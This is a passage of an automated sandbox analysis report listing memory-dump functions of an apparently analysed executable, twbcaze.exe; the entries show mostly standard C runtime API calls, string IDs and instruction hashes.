                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 6a06a2c0d6f406ebb987339e11d665c664df3075b5b77685e23857f55972794a
                                          • Instruction ID: 4e72711cbe370da124ff9bcb7bb46fb07669d8c76fc0a1cb41bda04e99651783
                                          • Opcode Fuzzy Hash: 6a06a2c0d6f406ebb987339e11d665c664df3075b5b77685e23857f55972794a
                                          • Instruction Fuzzy Hash: 9F01F132309622AEE63427777CA59A72685EF017F8320023FF624402F1FF5A9C85918C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004132DA,0040E8B6,?,0041335B,00000004,00000000,0040E8B6), ref: 00413265
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,004132DA,0040E8B6,?,0041335B,00000004,00000000,0040E8B6), ref: 00413278
                                          • FreeLibrary.KERNEL32(00000000,?,?,004132DA,0040E8B6,?,0041335B,00000004,00000000,0040E8B6), ref: 0041329B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: a9eaecb74b0f1c2e7d6bb8d2b937668f8ff8d246e60fd466908c7f8b95f40234
                                          • Instruction ID: f13012d448e515364a5808451a099c057f3e7b5a6003aace8a925c6212398a92
                                          • Opcode Fuzzy Hash: a9eaecb74b0f1c2e7d6bb8d2b937668f8ff8d246e60fd466908c7f8b95f40234
                                          • Instruction Fuzzy Hash: 73F08230601229FBDB219F51ED0DBDE7B78EB4075AF540062F405B1160CB789F45DB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 0040E88B
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040E896
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040E904
                                            • Part of subcall function 0040E78E: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0040E7A6
                                          • std::locale::_Setgloballocale.LIBCPMT ref: 0040E8B1
                                          • _Yarn.LIBCPMT ref: 0040E8C7
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                          • String ID:
                                          • API String ID: 1088826258-0
                                          • Opcode ID: 37234ab1be28d23009987259d219c472b90e351d95d08a6dda3180b4a3dfe735
                                          • Instruction ID: 3400708e6865e95127ac1b37d7fe9301104f7edf9cafbb999d1d02ea23cf3430
                                          • Opcode Fuzzy Hash: 37234ab1be28d23009987259d219c472b90e351d95d08a6dda3180b4a3dfe735
                                          • Instruction Fuzzy Hash: 5A019AB5A002209BCB0AEB22E955A7C3B61FB84308B14047EE801673D1CB786E12CBCD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 0041E3C0
                                            • Part of subcall function 0041AC67: HeapFree.KERNEL32(00000000,00000000), ref: 0041AC7D
                                            • Part of subcall function 0041AC67: GetLastError.KERNEL32(?,?,0041E816,?,00000000,?,?,?,0041E4A5,?,00000007,?,?,0041EE00,?,?), ref: 0041AC8F
                                          • _free.LIBCMT ref: 0041E3D2
                                          • _free.LIBCMT ref: 0041E3E4
                                          • _free.LIBCMT ref: 0041E3F6
                                          • _free.LIBCMT ref: 0041E408
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 5c83ae428773e25317788d744fd137d569673975ab9d6138c9deb8ca62736589
                                          • Instruction ID: 7b88bea65a0b1f43fc525d08b963a14049a3deac22f7c0dfed099887ad013867
                                          • Opcode Fuzzy Hash: 5c83ae428773e25317788d744fd137d569673975ab9d6138c9deb8ca62736589
                                          • Instruction Fuzzy Hash: 03F01236505244678620EB56E9C9C97B3D9AA00B107585C1BF858D7B51EB38FCD0469D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Users\user\AppData\Local\Temp\twbcaze.exe
                                          • API String ID: 0-2465341801
                                          • Opcode ID: 161bc1fe453a24d4e5947874a840ecbe141d76b8deb3dfb50e9ae0383eeec891
                                          • Instruction ID: bf390cfbd20c0f17ea5b1c3e0e8d24ea52ca80336ca7805b394e653bf088e3d1
                                          • Opcode Fuzzy Hash: 161bc1fe453a24d4e5947874a840ecbe141d76b8deb3dfb50e9ae0383eeec891
                                          • Instruction Fuzzy Hash: D8418071A00218ABCB21DF99EC859EFBBF8EBC5710B15006BE404D7351EB749A81CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0041A622,?,?,00000000,00000000,00000000,?), ref: 0041A741
                                          • CatchIt.LIBVCRUNTIME ref: 0041A827
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CatchEncodePointer
                                          • String ID: MOC$RCC
                                          • API String ID: 1435073870-2084237596
                                          • Opcode ID: afdf2972dbb9fa97222bd35efbdd43855ba8fda15f37328886d0e0c9617a3284
                                          • Instruction ID: 6a9cd9403bd27c86c1ea0c160311e29b31724f3b5871e5d2b4079279596d1eb7
                                          • Opcode Fuzzy Hash: afdf2972dbb9fa97222bd35efbdd43855ba8fda15f37328886d0e0c9617a3284
                                          • Instruction Fuzzy Hash: 02417871900109AFCF15EF98C981AEEBBB5BF48304F18805AF914A6251D339DEA1DB5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00407D05
                                            • Part of subcall function 004041C0: std::_Lockit::_Lockit.LIBCPMT ref: 004041E4
                                            • Part of subcall function 004041C0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040420F
                                          • std::_Facet_Register.LIBCPMT ref: 00407D93
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00407DD1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                          • String ID: 1|@
                                          • API String ID: 459529453-800989663
                                          • Opcode ID: f968c5a2ceffd9f62f956be7acafea80e481a352b490c4cb58a6bad916e8be5d
                                          • Instruction ID: df1d7254de4c4737ab4cdce48f978ba56a96f436c95f912a99cc71e35d993b47
                                          • Opcode Fuzzy Hash: f968c5a2ceffd9f62f956be7acafea80e481a352b490c4cb58a6bad916e8be5d
                                          • Instruction Fuzzy Hash: FD21D9B4D0420ADBCB04EFA5D5859AEBBF0AF04314F10457AE855B7391E774AA84CF8A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CloseHandle.KERNEL32(00000000), ref: 004248A4
                                          • GetLastError.KERNEL32(?,00424931,?,0042FC98,0000000C,0042482E,?,?,?), ref: 004248AE
                                          • __dosmaperr.LIBCMT ref: 004248D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseErrorHandleLast__dosmaperr
                                          • String ID: 8U
                                          • API String ID: 2583163307-1560779159
                                          • Opcode ID: b695ac448ec502b824e6d452526773643c5b8ea28f5126ec84344795acf40a58
                                          • Instruction ID: 2872174efd4d47e11b79a3ee67353118296fcb7ddf3ef0f6c6e2eb77d8ceda66
                                          • Opcode Fuzzy Hash: b695ac448ec502b824e6d452526773643c5b8ea28f5126ec84344795acf40a58
                                          • Instruction Fuzzy Hash: DF0129367141B007C67472B5B805B6E6B89CBC1B3CFA9026BF904972D2DA3C9881815D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • AcquireSRWLockExclusive.KERNEL32(00432638,?,?,00402B1E,?,?,00402A88,?,004028C7), ref: 0040E195
                                          • ReleaseSRWLockExclusive.KERNEL32(00432638,?,?,00402B1E,?,?,00402A88,?,004028C7), ref: 0040E1C8
                                          • WakeAllConditionVariable.KERNEL32(00432634,?,?,00402B1E,?,?,00402A88,?,004028C7), ref: 0040E1D3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                          • String ID: 8&C
                                          • API String ID: 1466638765-4180868660
                                          • Opcode ID: bb326b3d1a6057f6d4eda2fdb55b1c08876ac596fafac99671c5b540344f3fe5
                                          • Instruction ID: 63f9b1e205a4cf5fe4a8a0715ad09473f89d27546d428ca09e51556197a17499
                                          • Opcode Fuzzy Hash: bb326b3d1a6057f6d4eda2fdb55b1c08876ac596fafac99671c5b540344f3fe5
                                          • Instruction Fuzzy Hash: BBF039B4602210DFC318EF58F989999B7A8EB0D310B00147AFA0583330DBB46842CB5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AdjustPointer
                                          • String ID:
                                          • API String ID: 1740715915-0
                                          • Opcode ID: b1ffaf3be143962601bfd751bcf30ee1173fce86672cfef3168e1e718e814c89
                                          • Instruction ID: 05ac9061583e724ffec2fa218e0b3ff0f87b3e47112c77b43e326704fcf76a3e
                                          • Opcode Fuzzy Hash: b1ffaf3be143962601bfd751bcf30ee1173fce86672cfef3168e1e718e814c89
                                          • Instruction Fuzzy Hash: E851F172602202AFDB289F15D941BEA77B5EF04314F14442FE84187391E739ECE1CB9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                          • _free.LIBCMT ref: 0041AECA
                                          • _free.LIBCMT ref: 0041AF00
                                          • SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: 465fb4a1ee4c9454c80ef43f4a0eb4c141932a626125280fca3e2634ba948ceb
                                          • Instruction ID: 04fe7bfcbbf35f31ac0b3b3c8fdcf247abc73e494e7426076554552e017b386c
                                          • Opcode Fuzzy Hash: 465fb4a1ee4c9454c80ef43f4a0eb4c141932a626125280fca3e2634ba948ceb
                                          • Instruction Fuzzy Hash: 45112C713463012BC61176769C85FEB211ADBC03F9B25113BF138862E1EF2D8CE1415E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,0041531C,0041ACE4,?,?,0040E0E2,?,?,00401942,00000000,?,00401851), ref: 0041AFC4
                                          • _free.LIBCMT ref: 0041B021
                                          • _free.LIBCMT ref: 0041B057
                                          • SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,?,0041531C,0041ACE4,?,?,0040E0E2,?,?,00401942,00000000), ref: 0041B062
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: c9f735076e89557456e168ab1ef37200c4df73db6735b96dd666e663e5cfb4e8
                                          • Instruction ID: 47653adca3cb3e4d72ad73b2514f88ae9e3e3fde6527a25f988a1d2191d663d1
                                          • Opcode Fuzzy Hash: c9f735076e89557456e168ab1ef37200c4df73db6735b96dd666e663e5cfb4e8
                                          • Instruction Fuzzy Hash: 7511E9723051002BC6113A769CC5EA72659DBC57F9725113BF138862E2EF2D8CD141AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteConsoleW.KERNEL32 ref: 0042474D
                                          • GetLastError.KERNEL32(?,00424191,?,00000001,?,00000001,?,00422DD0,?,?,00000001,?,00000001,?,00422864,0041D2F5), ref: 00424759
                                            • Part of subcall function 004247AA: CloseHandle.KERNEL32(FFFFFFFE), ref: 004247BA
                                          • ___initconout.LIBCMT ref: 00424769
                                            • Part of subcall function 0042478B: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 0042479E
                                          • WriteConsoleW.KERNEL32 ref: 0042477E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: 350c2ee933c2393c7b9754eea8cbbf259ca380d9cec6957e6089de5b3cb8e804
                                          • Instruction ID: 382caa9a29c65e89878ef9e0e4a6c080ff036c71a35ae6ff5ac9d19cfbebcadd
                                          • Opcode Fuzzy Hash: 350c2ee933c2393c7b9754eea8cbbf259ca380d9cec6957e6089de5b3cb8e804
                                          • Instruction Fuzzy Hash: 32F03736201135BBCF221FD6EC089CA7F25FF89770B508122FE1985130D7718961EB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 00412FE2
                                            • Part of subcall function 0041AC67: HeapFree.KERNEL32(00000000,00000000), ref: 0041AC7D
                                            • Part of subcall function 0041AC67: GetLastError.KERNEL32(?,?,0041E816,?,00000000,?,?,?,0041E4A5,?,00000007,?,?,0041EE00,?,?), ref: 0041AC8F
                                          • _free.LIBCMT ref: 00412FF5
                                          • _free.LIBCMT ref: 00413006
                                          • _free.LIBCMT ref: 00413017
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: e9e5f2e41f3733c2eff641b063f42574cbd324a24f89577f96bb0eb8152791dc
                                          • Instruction ID: 5f81c87fe3d558299dbab55690507bf2b9849b575d915bdff1144723836fa9f9
                                          • Opcode Fuzzy Hash: e9e5f2e41f3733c2eff641b063f42574cbd324a24f89577f96bb0eb8152791dc
                                          • Instruction Fuzzy Hash: 31E04670901120AB8602AF12BD45489BF61EB14B02704E42BF84807332EB3A47A39FCE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,004137E7,?,?,?,00000055,?,-00000050,?,?,?), ref: 0041EF9D
                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,004137E7,?,?,?,00000055,?,-00000050,?,?), ref: 0041EFC8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$CodePageValid
                                          • String ID: utf8
                                          • API String ID: 943130320-905460609
                                          • Opcode ID: 2588997caceb56cb08feb0f826b7642f8072fed7b1e7b42a654ab6406482ac7e
                                          • Instruction ID: 648f6a098cce61d627996268e321a9ffc18456b901debb5a689669c47e2500d2
                                          • Opcode Fuzzy Hash: 2588997caceb56cb08feb0f826b7642f8072fed7b1e7b42a654ab6406482ac7e
                                          • Instruction Fuzzy Hash: 8651D435640201B6E725AB328C46FE777A8EF48704F14047BFD0997282F779AAC7866D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __aulldiv
                                          • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                          • API String ID: 3732870572-1956417402
                                          • Opcode ID: 60ce88543888415d76db726476f9516c1b217617e5ae6a872a2eac9c1540e8e2
                                          • Instruction ID: f914e1aa9013a1433de104594954d8dae758147185d19b661e85066580ed57eb
                                          • Opcode Fuzzy Hash: 60ce88543888415d76db726476f9516c1b217617e5ae6a872a2eac9c1540e8e2
                                          • Instruction Fuzzy Hash: D151E470A04249ABDF258E7E84817BFBBA9AF45700F14447FE480B73C2C2BC89468B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0041A1FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ___except_validate_context_record
                                          • String ID: csm$csm
                                          • API String ID: 3493665558-3733052814
                                          • Opcode ID: e1e810f7eec32865bd94398c0121fd3c4ff266d68d8713e2df609acbe281d2fe
                                          • Instruction ID: 1494fe649e5353dc08c68101fd2e464552a491e1779c1e50f007e242b881d39f
                                          • Opcode Fuzzy Hash: e1e810f7eec32865bd94398c0121fd3c4ff266d68d8713e2df609acbe281d2fe
                                          • Instruction Fuzzy Hash: 34318D325012189BCF269F91D8449EA7B66FF4A315B18419BF85449321D33BDCF2DB8A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: ($C
                                          • API String ID: 269201875-3609345990
                                          • Opcode ID: 5705296c8f5e2ce6e54b2a6dd93835eae09c5fc4b394eee21e1016d4c2dcc879
                                          • Instruction ID: 589da761933b8489358107600bae34912bf1acc48a6383ebcc3d4a682aba7f87
                                          • Opcode Fuzzy Hash: 5705296c8f5e2ce6e54b2a6dd93835eae09c5fc4b394eee21e1016d4c2dcc879
                                          • Instruction Fuzzy Hash: 5F1181B1F002044BD7219F29BC45B967798AB10724F14263BE924CB3D2E778DAC2469E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040449B
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004044FC
                                            • Part of subcall function 0040E6AA: _Yarn.LIBCPMT ref: 0040E6C9
                                            • Part of subcall function 0040E6AA: _Yarn.LIBCPMT ref: 0040E6ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                          • String ID: bad locale name
                                          • API String ID: 1908188788-1405518554
                                          • Opcode ID: 238c888e146f9155077e996780825bd2effd0d9b3f688fa335baba1fe65202fd
                                          • Instruction ID: 10351a998254b27a264eb5f60510b3b8a5f39e0114528638898faf0cfdb10de2
                                          • Opcode Fuzzy Hash: 238c888e146f9155077e996780825bd2effd0d9b3f688fa335baba1fe65202fd
                                          • Instruction Fuzzy Hash: 4C011B70D04108ABCB08FFA9D59166DBBB1EF8430CF04487EE74667782D6399A90CB5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040FD33
                                          • ___raise_securityfailure.LIBCMT ref: 0040FDF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                          • String ID: UDA
                                          • API String ID: 3761405300-16305742
                                          • Opcode ID: 30c31e43d8885961e1ee9a641670382ed8a5f0ed8d9ae32863fd0d8a5714705e
